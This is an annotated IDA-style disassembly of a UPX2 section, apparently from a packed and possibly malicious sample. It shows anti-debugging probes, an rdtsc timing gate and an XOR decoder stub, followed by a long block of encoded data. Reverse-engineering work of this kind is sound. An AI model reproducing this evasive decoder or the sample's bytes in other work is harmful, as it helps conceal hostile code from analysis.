dd 4EC138B4h, 6FE55AD3h, 0F10803DBh, 15FF5CB7h, 1001194h dd 0C3906890h, 0C48BED01h, 5B93D0FFh, 59E8h, 24648B00h dd 4EBB808h, 0FAEB0000h, 18A16764h, 30408B00h, 240B60Fh dd 7500F883h, 35h dup(0) dd 809B4700h, 8308AD7Ch, 9103317Ch, 7Ch, 119h dup(0) dd 2B000000h, 18F1h dup(0) db 90h ; --------------------------------------------------------------------------- call loc_3143102D ; =============== S U B R O U T I N E ======================================= sub_31431006 proc near ; CODE XREF: UPX2:3143107Dp push ebx mov ecx, 0CBFh mov ebx, edx loc_3143100E: ; CODE XREF: sub_31431006+13j xor [eax], dx lea edx, [ebx+edx] 
; CODE XREF: UPX2:31431082j
; NOTE(review): the label this xref belonged to was lost where the listing
; wraps; the jecxz near the end of this block calls it loc_31431011. What
; follows is the tail of sub_31431006's loop. Its head sits just before this
; point: push ebx / mov ecx, 0CBFh / mov ebx, edx, then at loc_3143100E
; xor [eax], dx / lea edx, [ebx+edx]. Taken together the routine XORs 0CBFh
; 16-bit words at eax in place; after each word the key in dx has the
; starting key (kept in ebx) added and its two bytes swapped.
                xchg    dl, dh                  ; swap the key bytes after the step was added
                lea     eax, [eax+2]            ; advance one 16-bit word
                loop    loc_3143100E            ; ecx was loaded with 0CBFh at entry
                pop     ebx
                retn
sub_31431006    endp

; ---------------------------------------------------------------------------
; Early-out taken from loc_31431052 when the timing gate fails: restores ebp
; and returns through the return address that loc_31431052 has already
; lowered by 8E06h, without calling sub_31431006.

loc_3143101D:                           ; CODE XREF: UPX2:31431068j
                pop     ebp
                retn
; ---------------------------------------------------------------------------
; Two data bytes. `mov dx, [eax-63h]` at loc_31431052 appears to read this
; pair as the initial key word (8E08h little-endian) - worked out from the
; listing's label addresses, confirm against the binary.
                db    8
                db  8Eh

; =============== S U B R O U T I N E =======================================
; Returns the time-stamp counter; rdtsc leaves it in edx:eax.

sub_31431021    proc near               ; CODE XREF: UPX2:loc_31431047p
                                        ; UPX2:3143104Dp
                rdtsc
                retn
sub_31431021    endp

; ---------------------------------------------------------------------------
; Forced-fail path. With eax = 1000h and ecx = 0 the "elapsed" value computed
; at loc_31431052 is 1000h, which is not below 100h, so the early-out at
; loc_3143101D is taken and nothing is decoded.

loc_31431024:                           ; CODE XREF: UPX2:31431035j
                                        ; UPX2:3143103Fj ...
                mov     eax, 1000h
                xor     ecx, ecx
                jmp     short loc_31431052
; ---------------------------------------------------------------------------
; Entry of this stub. It is reached by the `call loc_3143102D` placed directly
; in front of sub_31431006, so the return address on the stack is the address
; of sub_31431006.
; NOTE(review): the tests on eax, `int 2Ch`, cs and ebx below look like
; environment probes; what each one distinguishes is not established by this
; listing. Every branch to loc_31431024 ends in the early-out.

loc_3143102D:                           ; CODE XREF: UPX2:31431001p
                test    eax, eax
                jnz     short loc_31431039
                int     2Ch             ; Internal routine for MSDOS (IRET)
                test    eax, eax
                jns     short loc_31431024
                jmp     short loc_31431047
; ---------------------------------------------------------------------------

loc_31431039:                           ; CODE XREF: UPX2:3143102Fj
                mov     dx, cs
                shl     ebx, 0Ah
                js      short loc_31431024
                jnb     short loc_31431024
                cmp     dh, bh
                jz      short loc_31431024

; Timing gate: two rdtsc samples taken back to back.
loc_31431047:                           ; CODE XREF: UPX2:31431037j
                call    sub_31431021            ; first sample
                xchg    eax, ecx                ; keep its low dword in ecx
                call    sub_31431021            ; second sample, low dword in eax

loc_31431052:                           ; CODE XREF: UPX2:3143102Bj
                neg     ecx
                push    ebp
                add     eax, ecx                ; eax = second sample - first sample
                mov     ebp, [esp+4]            ; return address left by the entry call
                sub     dword ptr [esp+4], 8E06h ; the eventual retn lands 8E06h lower
                sub     eax, 100h
                jnb     short loc_3143101D      ; 100h or more elapsed: leave without decoding
                sub     ebp, 301006h            ; ebp = delta for the [ebp+30xxxxh] operands
                lea     eax, [ebp+301082h]      ; start of the region to decode
                mov     dx, [eax-63h]           ; initial 16-bit key
                call    sub_31431006            ; XOR 0CBFh words in place
; NOTE(review): by the xref addresses, the region handed to sub_31431006
; starts at the instruction right after this call. If so, the instructions and
; data IDA shows from here on are the stored, still-encoded bytes and not the
; code that runs after decoding.
                jecxz   short near ptr loc_31431011+1
                xchg    eax, edi
                dec     esp
                mov     edx, 3445332Ch
                dec     edx
                mov     bh, 0C3h
                lodsb
                shl     ebp, 1
                lahf
                cmp     dl, [edx+7C1DE97Ch]
                sbb     bh, dh
; ---------------------------------------------------------------------------
                dw 0F98Ch
                dd 94611F51h, 46A07EBDh, 5F54D441h, 186F4E28h, 0F378BDD8h
                dd 956D0223h, 48E67A22h, 2035DBDEh, 23A1CA3h, 0C7962419h
                dd 0F6745570h, 7EF8C37h, 0BED89EF0h, 448F3788h, 5A63422Eh
                dd 73ED5283h, 7DE6B201h, 0EB6AEADBh, 5ADD5368h, 3846B7B1h
                dd 0E80DB20Ah,
0C75BEA6Ah, 8D0A9185h, 51DE0F1Bh, 0DC47C4D4h dd 21AC4D02h, 0B65F90A9h, 0FE7CB18Ch, 11BBD70Ch, 0A7219F77h dd 52DB6A35h, 0B205DAB8h, 0C8F310Fh, 2986B8F7h, 0BF0E0404h dd 94D1713h, 443BADBDh, 0B1554C8Fh, 0BD98261Bh, 0A9F4FA84h dd 0DA160522h, 0B3C91EA7h, 0E33C313Eh, 0DC65D2ACh, 0E4EDE6Ah dd 881C315h, 8B972C15h, 63AD1F1Ch, 0D83E3004h, 0E9D84B68h dd 0C645EC5Bh, 3FB0FA84h, 119B3D0Fh, 0A58C2E79h, 0FFC7096Ch dd 0E05B27FFh, 0FAAC6572h, 209CCAB5h, 0BC6A909Eh, 0A94A275Eh dd 0D27B979Bh, 7AA1E46Fh, 0EB466408h, 11847FBCh, 2A930010h dd 65BAAC53h, 56FF547Ch, 8DF028E4h, 43FB5D50h, 9D9E1CF9h dd 0AF279973h, 2FA968B6h, 0B390C693h, 79E94B69h, 2D957476h dd 1E7E88A5h, 59AC1E75h, 68D74BC1h, 0DAD87A7Dh, 0B2EAEF2Dh dd 1C047680h, 319AB994h, 58BBA29Fh, 4DC199FCh, 0E3B14FDBh dd 0F4F25461h, 3F990792h, 5ABB639Dh, 1B58A5D1h, 0D9204042h dd 0EAB9926Ch, 0CD6C7360h, 18A78D8Bh, 39F59DDDh, 0E824ED49h dd 54CE4325h, 0FEF129E3h, 2FA5C53h, 0D81522D4h, 0ACDE1CA9h dd 2E2B2E3Ch, 0B253AED2h, 0F0E85E68h, 77FF096h, 89807894h dd 0B7AB2D00h, 13C5BC00h, 34D74954h, 0F4058FECh, 0E0037182h dd 2C71CA18h, 0E62ECBF9h, 4DC5362Ch, 0F7CE32DAh, 10F1535Ah dd 0E86F90Ch, 8E081A63h, 3F5B2502h, 3949BBC8h, 66DF53F4h dd 1F2CE79Eh, 6D011780h, 188B8AB5h, 7DC642B6h, 7EF482CFh dd 0E563D5D2h, 80FBE6FCh, 1789E90Fh, 0F96B97A5h, 43F7617Fh dd 0F300562Eh, 0DA6A5957h, 54EF857h, 26994FA0h, 319A3680h dd 2FD3BF0Eh, 5DD64A91h, 0D9B56368h, 860274B1h, 1F9A5393h dd 18AB2BADh, 0B4C40669h, 64D5CDA9h, 77C04B02h, 24EB4584h dd 5CE38EABh, 0BEBD2431h, 0CF48B8FDh, 4F1FD5D6h, 8B8BE6C3h dd 2B8FF388h, 0A6A02236h, 8D1F1208h, 5333C14Bh, 0F2E5DBE1h dd 0F4F86A75h, 26A4B18Bh, 0AD5469A4h, 6B7BA9B5h, 65D1C2E0h dd 6ED671A7h, 47D1103h, 9BEF029Dh, 0BD221B28h, 0C60F9B0Bh dd 2D2A5EB7h, 3CEE52EBh, 90143A9h, 2EBEC7ABh, 0B4D260ACh dd 91443A42h, 859CBD9h, 76EF6088h, 27AA4A89h, 6D908DAAh dd 0E147235Ah, 4D43C939h, 24B74CBDh, 90241CF1h, 1D111188h dd 168A86ABh, 0BC291EB4h, 56463D4Ah, 179E2DADh, 0F35C0F89h dd 148DB208h, 14595A2h, 0EBBD6CB5h, 0B0E325FCh, 0E71EB5CFh dd 6A7C872Eh, 
9812DA13h, 2EC2D6ADh, 0C4547437h, 5AD4463Ah dd 0A12AB6E0h, 0D60E182Ch, 362F9DEBh, 31749E9Ah, 0CBAA7484h dd 5558CA88h, 0FFEE0AB8h, 60809CCEh, 0F218E698h, 0B5D82244h dd 0A646B89Ah, 9DB61F5Ah, 45E71BA0h, 0D1084AACh, 2B619545h dd 0BA359B36h, 507FB148h, 5F60E2CEh, 7CF66FD5h, 0B77F1181h dd 0B8227921h, 0BB352A06h, 0D47ED4CAh, 0FF69B69Dh, 4BF5C6h dd 0E7847CDCh, 0C4A7290Eh, 0C23DAFACh, 33BC2A1Ch, 9C39AB93h dd 0E8960715h, 4DF06076h, 0D45EF1C8h, 0B891337Eh, 0ED7DC440h dd 6268D66Bh, 5983C52Bh, 0F539E1C3h, 0F03ADED2h, 4E4587E9h dd 5EAE1299h, 0A1738979h, 0E7D3F2D3h, 32755D1Ah, 0EA33A5B1h dd 2DAC7F22h, 970FB6A8h, 179C111Ah, 11EE9A6Ch, 0B6B46CC9h dd 0B6B7191Fh, 851BE90Fh, 96B40331h, 0CF534262h, 85CB028Dh dd 2A30E874h, 0AB3B9D93h, 0A8D3294Fh, 0DD4DE070h, 82D5D67Bh dd 31040512h, 94251249h, 0D340666Ah, 0DC65ED55h, 0D768AB59h dd 8B1D81Dh, 6140DD96h, 4879AB9h, 0BE8330C2h, 9E5A0D04h dd 98193EAh, 0E60D53F0h, 0DDB1671Ah, 881BDE25h, 3A07BC46h dd 5B55C00h, 49F36576h, 206A6AC1h, 8D0214A7h, 14C02704h dd 0C2877C4Bh, 3CB15360h, 0AE26BFA6h, 1F22CDCh, 2A933F13h dd 0B4606B3Dh, 72BBBE41h, 0F1E058ECh, 6AFB5D51h, 0E66EFE7Dh dd 0AEB266F4h, 0AEBD1F17h, 0F397444Bh, 26E95B68h, 2D816400h dd 8E988A5h, 339C342Ah, 36B85828h, 5FD84AA8h, 0C634E0EDh dd 0DA55274Ah, 219B6448h, 73BBA2ABh, 41AC6814h, 200E0A50h dd 2D840127h, 0F0681207h, 30936F62h, 3B84337Fh, 811BED9Bh dd 4DE5C7A0h, 39F5E8C5h, 6C87BDABh, 29FA4C79h, 0BF38B434h dd 55CE50C3h, 0EB64D6E2h, 81FA6C79h, 18900210h, 5175CEF7h dd 749623A9h, 760B6FD2h, 8B9D9AECh, 5ABC1E1Ch, 0F966E6D6h dd 57C67C64h, 0A223FCA4h, 2DA32A33h, 97088CB0h, 0F86A23F6h dd 4C997E6Ch, 0D55DD5DDh, 20C54325h, 8E29B9A9h, 3BF10D15h dd 7AE69C74h, 0C874C9F9h, 79B36457h, 0A428DEBAh, 0AB6173Bh dd 8C14AA91h, 0F56514FAh, 5AE21361h, 0DB43C8D3h, 37A24D1Ch dd 0AB10A687h, 0E58B2878h, 45EA756Eh, 0D94AFAC0h, 31D3795Eh dd 0D935A2B4h, 0E822B24h, 6D2A8A89h, 0FF75E3E1h, 54D85F29h dd 9325C6DEh, 35BA273Ah, 0C01CB28Eh, 0E86C27B3h, 70F07967h dd 0CD6BA0D9h, 2390422Ah, 853BA9ABh, 395256Fh, 68EA9143h dd 0D168FADAh, 
4DC74658h, 0CF09C9A2h, 23AA351Ah, 0A8118A9Ah dd 916F06E0h, 61D47758h, 0E953C4DCh, 53A95322h, 0A416B1A6h dd 138D0E18h, 7AE7466Bh, 0C145D8C1h, 5BA6D5Fh, 0B71DB6B5h dd 0B8A2D02h, 60138FB4h, 9A52E0FEh, 63DD7E6Fh, 0A34BC2C7h dd 2EBC0339h, 9D1FBE8Fh, 88400AF2h, 4AE36C51h, 0F25DF2C9h dd 4A6592Bh, 0A13CA6B9h, 28A266Eh, 7CE89250h, 0CA6FECCAh dd 5DF62371h, 0BC22EFB2h, 0AB2262Fh, 8E16A2F2h, 0E37B1EDEh dd 63F17E77h, 0FB35E6CCh, 3D9D492Fh, 8D0CA68Ch, 1191073Fh dd 60EC927Eh, 0EB4DFACBh, 2FD56C38h, 9723A0ACh, 0F8A3B08h dd 6313A1FAh, 0FA7BC8F4h, 57DA7B54h, 0A573B0FDh, 3FBD1022h dd 0B60C939Fh, 86651E17h, 72F3785Bh, 0D740F7ECh, 38B2550Dh dd 9F3FA4BFh, 119E2F6Ch, 65F6A66Ch, 0D369E9FBh, 59C2722Eh dd 0BF35DDA7h, 0B9A7C69h, 0F8069782h, 0ED6708D6h, 17ED6379h dd 0C251E880h, 35983C3Ch, 8F26B6BFh, 2FF60D18h, 7BCA8A6Fh dd 0DC63F1CCh, 5CD15842h, 0A72BB4B9h, 0FB75623h, 6C12AA8Ch dd 0FF7ED3EBh, 5EC26D4Ah, 0B658FCBAh, 3DBF2C16h, 8B04B2B2h dd 0E193227Ch, 4E957776h, 0C14AF0C7h, 30A45A69h, 0B411AF9Ah dd 25ED3A07h, 7CF78768h, 0F358E7F6h, 35CC4E41h, 0BF2CC594h dd 0DB20B3Ch, 833FE38Ah, 0F86D1DC4h, 51CD7B68h, 0D55AD3D8h dd 3CAC5C22h, 8034BE89h, 0FBB671Dh, 70EE8F4Ah, 0CE67F6EBh dd 73B74C59h, 0B63FFCBFh, 39862100h, 9A1A8485h, 0DB0FF2FEh dd 4ED75457h, 915ED9D8h, 32B22C3Dh, 9522AA96h, 0C089217Bh dd 6EF26060h, 0D34CC8CDh, 28D0584Ah, 912189D4h, 1BBD2D0Bh dd 6ECE8465h, 0EA74ECC5h, 34C37045h, 0BA0CC18Ch, 99F253Dh dd 0B86F8482h, 0E97538F0h, 4DE95D74h, 0CB42C6D3h, 2BAC5612h dd 9013CFB2h, 1496153Dh, 64EA9E5Bh, 0A671FEF7h, 4EE5537Ah dd 0B12EC9A5h, 1A880514h, 92169C82h, 0FB601AC1h, 64A36C50h dd 0A54CFACCh, 2F9C383Ch, 8100A397h, 0ED9D0333h, 6DF06E63h dd 0AF49F6CEh, 37EA5B73h, 8D36B1BAh, 49D2900h, 62CD9D9Eh dd 0E464E7F8h, 5FD84C2Bh, 0AA2BDA94h, 0CBD2E38h, 9B079299h dd 0CA6B22E4h, 72F37F77h dd 0D959D0DBh, 1E913822h, 82289D9Ah, 9871003h, 60E49907h dd 0CA6DF5EEh, 4FD14D50h, 0BF25DFC9h, 13833731h, 89138FF5h dd 0E77F11E3h, 48CC6D43h, 0CD38CFDAh, 55B82328h, 8F0AB390h dd 0E2951F79h, 18E4677Bh, 0CB52F6EFh, 30D9404Eh, 
0A93DA891h dd 1E89120Dh, 61A9C9Ah, 0F961E9DDh, 46CE7358h, 8B35D687h dd 3BB92739h, 9008AB8Fh, 0FE6201D1h, 4ED00B7Dh, 0D85DC4DAh dd 3C8A4321h, 0E21AA3BFh, 1D850D39h, 7AE29774h, 0CA78FFD3h dd 7BDF5767h, 0A427F2C8h, 3B1233Bh, 9D10B580h, 0FE623BEEh dd 6CE01345h, 0F767E8E0h, 10E30D7Fh, 0B86399AEh, 0ECBA0C1Dh dd 5CEA7260h, 0FF25EEC0h, 33F44A5Eh, 0BC1AADB4h, 2E9F1C1Eh dd 621BBDFDh, 0E971F3C2h, 5DCB4A50h, 0BF05D7CAh, 38844814h dd 87098D8Ch, 0FC6E15D7h, 5EE04F72h, 0B0C723ADh, 2395FE68h dd 95ACCD9h, 74D42EE2h, 8ECF86Fh, 0C94FDECAh, 697EAF34h dd 9B186E4Ch, 378F1037h, 36E119A0h, 120A4CA3h, 0B25F1EDBh dd 0BD068260h, 90C4FAC8h, 40E759B6h, 4CF85A62h, 16E450F1h dd 39DB98CEh, 428A0643h, 5C5F0255h, 6EE658F6h, 5AFE86ACh dd 4E988592h, 0FC221B42h, 0C657F1D4h, 36D55754h, 0F2018FE8h dd 885FF0E8h, 4F976316h, 21D2CFFFh, 4AF31FFFh, 75A69287h dd 76DF4B6Fh, 50F10881h, 0B79B0011h, 34522300h, 0DE472C4Bh dd 0B5DE4F6Ch, 288CB6A5h, 0BAA4FE03h, 0A912112Eh, 0BC35BED8h dd 0AD3469A2h, 29E4581Fh, 0F3F7595Ch, 14944683h, 55607DA2h dd 0C532D4C7h, 0D67FEB7Fh, 7525D8E9h, 3094EDFAh, 13ED7B6Fh dd 1E82AFA3h, 0B0FE35BCh, 975BCB59h, 186ADCF1h, 79FF8D63h dd 0DFC9CF9Fh, 0B22C76FFh, 0C99F3440h, 0EE42B83Bh, 0F927536Ch dd 3AA43A87h, 0F14EDD98h, 67E1727Fh, 0E6732D3Bh, 665B4E6Ah dd 0F9E71BD4h, 0D3084AACh, 719E14DEh, 0BA34A65Ah, 0BD4B6148h dd 0E650C87Fh, 0E97B971Eh, 12BCE466h, 88EFC6F0h, 3E922A12h dd 0B242044Fh, 7056D3A5h, 20B6ECC8h, 8CA50649h, 2C831914h dd 160AF90h, 59B9443Ah, 9D96E819h, 1EA8E78h, 736573D3h dd 0B12B9DA2h, 449AE3B4h, 68DAF585h, 73DD45BBh, 88F4F8Ah dd 15928B97h, 35AF2025h, 6E4FC0h, 9210C639h, 0F2058249h dd 66F29BC2h, 2C5A8CD9h, 0EAE72EE6h, 1B99F7CCh, 0B70E91B7h dd 0EE0A9819h, 11BBD7C4h, 2C2D571Ch, 0D9D14A0h, 509A94CBh dd 6E24528Bh, 0FF91EB9Dh, 560CD604h, 82824Ah, 453EAD89h dd 97E24B47h, 647D69A7h, 0B3D648EEh, 9771F212h, 4E83FAEAh dd 855E44F7h, 0DC552F81h, 0F3B65D6Ah, 389A91EDh, 0B58A0296h dd 0B7AD2F07h, 0CA4B91BEh, 6060CF57h, 1AEEE1EEh, 8C05758Ch dd 239F654Eh, 2DCEA3B0h, 4EF7131Bh, 60D03357h, 7AF26156h dd 
10E3AB08h, 0A61F9576h, 68E77134h, 47B4EACAh, 68D17939h dd 69FA20C5h, 940D7E88h, 28C94473h, 0A838C1E9h, 16CF414Eh dd 0C9F028B6h, 14FB5D50h, 42E5F594h, 0AB4FCDF7h, 12BD2F3Ch dd 0FB77712Ch, 8EE95B6Bh, 37ABF86Ah, 5D93D195h, 274F085Fh dd 0A3963F91h, 8891857h, 50FB1FBBh, 0D20446A9h, 0F1EFCC9Ch dd 0B6A55DF9h, 0C0C6086Fh, 0B40E8A8Ch, 0F4AA201Bh, 0F89FE90h dd 652D3B9Dh, 0C8ED3659h, 811AEC62h, 37B0020Fh, 0D0E317A7h dd 120C4EA1h, 29A01CE5h, 9B4C55B7h, 0AC5BBF45h, 0B864E6C9h dd 0AB03F986h, 0DACD0220h, 90A698A2h, 2BD5B36h, 0CF2E4959h dd 690B5A58h, 167F6573h, 4D1687A4h, 0B679E27Ch, 37C9BC00h dd 51D74956h, 0F46D2F68h, 0B03DF582h, 0A0DF1B6Dh, 3220A190h dd 4CC537A5h, 977BF35Ah, 46702581h, 49C9B056h, 6B96ADE9h dd 75B263F4h, 0BA1875E3h, 3589005Eh, 0D684720Bh, 0A9527DBAh dd 97241CE1h, 5737A9B6h, 54CD3FFDh, 0B833EB63h, 5F63D31h dd 178F01AAh, 12D5126h, 0C7B42007h, 0D951C348h, 9C92795Bh dd 0A44D351h, 9B140A16h, 11A7B129h, 0FA60929Fh, 29B32F74h dd 0CFC0A19Eh, 87E01A1h, 77B8F569h, 0C45BD4D9h, 3BC748C2h dd 9475E3E3h, 88B7A407h, 0B7B7F705h, 0A31CA98Bh, 0C6E0C6C6h dd 0FF622352h, 351E635Dh, 1324B6A3h, 910A7C80h, 49D77D5Bh dd 0D957C7D9h, 5259C14Bh, 6C62E4CAh, 4CCE1EB7h, 3D0B89C7h dd 0FD24A68Fh, 42B92C52h, 8E019354h, 6B73A736h, 897DDED7h dd 0AA08D907h, 0F99A4B28h, 946FE0EAh, 0C92A1605h, 0F25BF7DFh dd 77257707h, 2EBD0883h, 34EE67ACh, 7AD65ACFh, 23A0CAD8h dd 72CB3DE5h, 0C85F7ECh, 4F9AD09Ah, 38813E59h, 0E034044Dh dd 0D1564F6Ch, 0FA43CB89h, 1D82808Bh, 26AF3F69h, 39BE0247h dd 52FB1339h, 0C60E466Bh, 0FBF46946h, 14BDD16Bh, 224B972Bh dd 0BFB92B2Bh, 0E665585Bh, 302CBC64h, 6B0A88BEh, 0C84EE1F3h dd 47DB634Eh, 8952D1DFh, 28BB2B37h, 2259DC91h, 7052BDF5h dd 0FD155ACDh, 0B16CF4A9h, 229063B9h, 79ED47CEh, 0CDEE5071h dd 0A84F615h, 5E578815h, 504FDDD1h, 8142356Fh, 62DC4E5Ah dd 0BFFF4F96h, 6A3AD182h, 0C63576B0h, 0D9A12B49h, 4CA0C66h dd 1932D4B4h, 4CDCA1E1h, 36F8750Ah, 0B0E617A8h, 0BBB7EAB3h dd 0D44EC169h, 4A8C5608h, 567BECF9h, 3EE88E4h, 2C9733F5h dd 4931F131h, 0C55A551Eh, 0EE59F581h, 0AA94FCF5h, 0F8140723h dd 
0BED46DA9h, 47AB606Eh, 68A8CFBFh, 73DD7108h, 23F660FEh dd 60498BA7h, 5814298h, 0CAD048C3h, 39DB7D73h, 0F8E2236Ah dd 8D062D01h, 181C691Bh, 0B547FFFCh, 0D25CC414h, 0C5FE1F7h dd 7BF56632h, 11434384h, 102E939Fh, 493A377Bh, 0D725A0FAh dd 3EE35560h, 0D52C7E08h, 0C25981BDh, 1B882DCh, 82B0AD89h dd 0DC124073h, 3E64A1B5h, 8DD1DF0h, 2E1E1D58h, 0B384CA9Bh dd 47C7B0FDh, 0AE3094B1h, 8009581Eh, 212C1859h, 0EC9CAD9Ah dd 0C7AE4608h, 0C55FE749h, 63974FEFh, 745B6A3Dh, 0C28E8487h dd 4D2E8412h, 3331939Eh, 29720270h, 965DFFF2h, 1D464EF1h dd 2B89CB26h, 9631FA2Bh, 4D362834h, 0E1B44235h, 1B54DAA0h dd 7777D9D8h, 0A4230801h, 40F34522h, 0C153FBBBh, 56CF4126h dd 699A8064h, 82CB7802h, 33B496EEh, 22D89997h, 458D3A45h dd 0D4AC3D50h, 8E1660EDh, 64057800h, 0F716B8BBh, 65AC742Bh dd 58D74B91h, 0D4D87A7Dh, 0C5409768h, 89E4B783h, 21F05C49h dd 9D5D3750h, 0C84F3875h, 0E36CE0A0h, 7998B0FAh, 5FBA0555h dd 8B7D2562h, 0AE4B2603h, 0D17A9640h, 4983D7D4h, 0F9FFE8C5h dd 929981AFh, 0A2A2240Bh, 0AB396E4h, 55FE6E36h, 0DF7E8268h dd 14D192F2h, 18A02C77h, 8051152Dh, 6F112E0Ch, 20B06F10h dd 6D88DFE5h, 572EF0CEh, 0CD44D7C7h, 189E88D5h, 3711B3F0h dd 6EFD48C3h, 87481CECh, 0EF395FB8h, 4CFB6A76h, 0F615C5CBh dd 20A05F37h, 0CC69FEB6h, 549D0F14h, 5D87C82Bh, 0E149DCC5h dd 4FF0797Fh, 0BE2CC9BAh, 8B0122Ah, 901A9580h, 0CE7F18D9h dd 5ED37673h, 0CD52CADFh, 35A56C10h, 0AB07B090h, 0F39C081Bh dd 76DF5D7Ch, 0C848F6D7h, 30C9484Fh, 0AB38858Dh, 3862E02h dd 6911BF91h, 0C76DE5FAh, 5FCB687Ah, 0A332D3DBh, 3BB93A05h dd 0AF09B282h, 0E17601C0h, 65F17878h, 0C56FC4C8h, 28AD5A33h dd 8E33B8B8h, 3BAC1101h, 0DF28B6Ch, 0F75AC1C8h, 7CE06566h dd 0AC21F79Bh, 0AAD3F2Fh, 0AC289295h, 0FE6E12E0h, 64FC6168h dd 0D844DAC0h, 369A4A25h, 860BA793h, 7BD3619h, 64E16C7Eh dd 0F824E4C1h, 27DD5E5Bh, 0AB3F8AA4h, 6EE45812h, 74B3BEFCh dd 0E86301F6h, 5DC06347h dd 0AD4BDF90h, 2CB92926h, 9C02F38Bh, 0C6011CE6h, 3EDC4A5Fh dd 0C649FAC6h, 30B24332h, 0A50A9ED2h, 3C86413Ch, 2CCBBE4Bh dd 0D072FBBCh, 32825644h, 0CE475193h, 0E5804F5Ch, 0CA53371Fh dd 0FF8CBD88h, 269F210Bh, 9654324Bh, 
0BA0A3D7Ah, 825DA7FFh dd 6B42E268h, 4D8DCF26h, 0DF0DA90Eh, 7E384D12h, 0F53ADC31h dd 47C4EAE9h, 74F7EDCAh, 0FEB7D392h, 6C2D9783h, 4B3E8095h dd 6AFD2ED7h, 0B6E326E8h, 784EFE84h, 0FE97B9EFh, 3F727565h dd 78D79DC5h, 0DE329AD6h, 0E1116E06h, 0AB4DC7Bh, 0A83EF01Bh dd 0DEF6572Ah, 0CC46B8CCh, 4C9F0809h, 0F83EA8B4h, 0A459EF79h dd 0E495102Ch, 0B85EB2C6h, 0A9B7D418h, 739F2D21h, 7CC64279h dd 10F83E8Fh, 0A3CA445Fh, 6DB82A36h, 9B11838Ah, 26A07831h dd 9584ECB4h, 9621A9DFh, 0D35E4FCCh, 0C2364745h, 0B864550h dd 0DC5A89A3h, 0C8B33552h, 6A00F813h, 592BAD83h, 47C13335h dd 0AF27BAA2h, 15993102h, 0F6D3F540h, 0AF338602h, 2C2AA82Dh dd 0C44587E9h, 5F56C068h, 7E71D3F6h, 0BD2C5E00h, 0B6625E1Bh dd 0B9038FC0h, 4FCD53D4h, 50D2D1DDh, 7BC57E38h, 1C367050h dd 4F21A3B4h, 0C248DA95h, 43C878ADh, 69E36541h, 6DDC68A7h dd 950FB1ADh, 0BF582AEh, 956BAD89h, 57BB4225h, 0ED65B1B7h dd 1602EF7Bh, 1AA32E03h, 0C5735B2Dh, 0C532BC1Ch, 8E55F7F4h dd 0C7665B00h, 8B1D390h, 0CE47DFC2h, 0A1524D7Dh, 0CA739ED7h dd 6D4CB400h, 306FD1C5h, 0BC285901h, 30730D1Ah, 47CE5C43h dd 7ED544CBh, 0A8D808DCh, 2CF35567h, 0F8BAA45Ch, 59E06363h dd 29F9A2F3h, 861DBDFAh, 8609673Fh, 39881604h, 0A4183309h dd 75DB4322h, 32E6438Ch, 0D308BEB1h, 0EC55C2A8h, 0D68D082Ch dd 9C1CCA22h, 0AF17B7D8h, 14EC7E6Ch, 8A029483h, 5B80CE96h dd 927FF1CFh, 9D26A2F4h, 46B3F6EAh, 0C94E5CB5h, 178B4A57h dd 0A52FB7A1h, 0C74058CAh, 0B4650C55h, 0B70088DEh, 4DC634ADh dd 0B0149DDBh, 18A41014h, 4EED8F6Bh, 30E1C09Dh, 3B840C3Eh dd 0FEFF315Ah, 0FE06274h, 0FD76E83Dh, 6C0C14DDh, 198859B4h dd 1AD27B7h, 0D8CE7052h, 0DB4F215Eh, 0D6A83A79h, 328997EFh dd 6AA59896h, 9F29A330h, 8A52F4CDh, 26E9303Fh, 67D98ACh dd 4FEA0794h, 0CD51B0C2h, 0FAFC303Fh, 5ED77943h, 7C05D498h dd 75037591h, 10B3928Dh, 0B62349AEh, 1F923744h, 0D1108E95h dd 34B54D42h, 9B78F94Ah, 0A42DA5EDh, 3AB44DA1h, 65C4BBC8h dd 66EF49FCh, 21C86AADh, 7A0B4DA0h, 0D75EE110h, 0BE37A55Eh dd 1A84684Ch, 0BE269BABh, 0CCB52F56h, 661AFE0Fh, 2825A78Fh dd 763F22FBh, 4A51C3D3h, 6FE75C0Fh, 0E5CB62FDh, 0C214B68Bh dd 1B53A1A4h, 3EA8B28Fh, 
0DE29B7A4h, 0C3462356h, 0D0D7481h dd 1F980807h, 0B4BE4C2Ch, 23903643h, 0E15ACDD8h, 5D2DF790h dd 0C907F835h, 0A31C8F0Bh, 5366AF61h, 5AB7E8C7h, 65EE7AA0h dd 8E2D2676h, 82821484h, 0B25F121Fh, 0BD06822Ch, 0EE4FDCA0h dd 0E952F473h, 0F2D11F77h, 26AE968Bh, 39DBC6A4h, 428A06D3h dd 5C5F0255h, 6EE659EFh, 8F71AE77h, 15237A92h, 8989ADh dd 0E8BA77BEh, 5DD57779h, 0F301DD80h, 1DFE71EAh, 1EA723E3h dd 0BBD2672Fh, 4AC255C6h, 75D458D8h, 76DF41E0h, 5FD7E76Eh dd 88FE1865h, 0F8342300h, 0CF073CC9h, 0D9504F5Ch, 0FA43C542h dd 91E17339h, 4E60EEE9h, 0BC35A720h, 0DB2D1614h, 1735F7D4h dd 4EDD0CE3h, 0AA30720Ch, 1B23A582h, 0B65BC339h, 43C23E31h dd 6CD577CFh, 1614ED90h, 0CA128490h, 0DF3DE575h, 493E8096h dd 0D7C06216h, 0C044A37Dh, 300F227Eh, 38D2831Eh, 0BACC5FBEh dd 5AC37E42h, 944AC89Ch, 50AA6B6Fh, 565760Ah, 0F1126C59h dd 26946625h, 41168A3Bh, 52F761E7h, 0F86E0CF0h, 0A02D7A86h dd 0ABE682Ah, 80148892h, 7EEF196Dh, 9E45AAE6h, 76854D54h dd 5CC5B140h, 57759480h, 0E9233A3h, 788A41CCh, 0E45662h dd 532CBCF8h, 0BCE01671h, 0A12C1914h, 0C20DBA88h, 4330453Ah dd 0BF64128Dh, 84FF7494h, 7FB02113h, 4E7C9DA3h, 77EB2AAAh dd 0D1934AD5h, 1BE6B43Bh, 983F509h, 0BFDD361Ah, 66F8211Dh dd 0E1B4223Ch, 0A15E4D69h, 42FCB791h, 8D3752AAh, 36AFAA98h dd 3433A581h, 7FE415CAh, 8F91FADDh, 28A33673h, 3B6668F6h dd 5FA293AFh, 0AC985735h, 66C04140h, 69D37E4Eh, 518BE647h dd 7D6F91F8h, 0D45AE1C9h, 222CDFD8h, 56A6CE46h, 22EC330Eh dd 3E70A150h, 1AA32E3Dh, 47AE3F5Bh, 0B9EC88D5h, 0EC7F2641h dd 1D56DD6Ah, 981C315h, 0AE7FA3E2h, 0CBAD1F59h, 0FA692C57h dd 4E64CB58h, 0F66FD1C3h, 9C266F0h, 22AB2D88h, 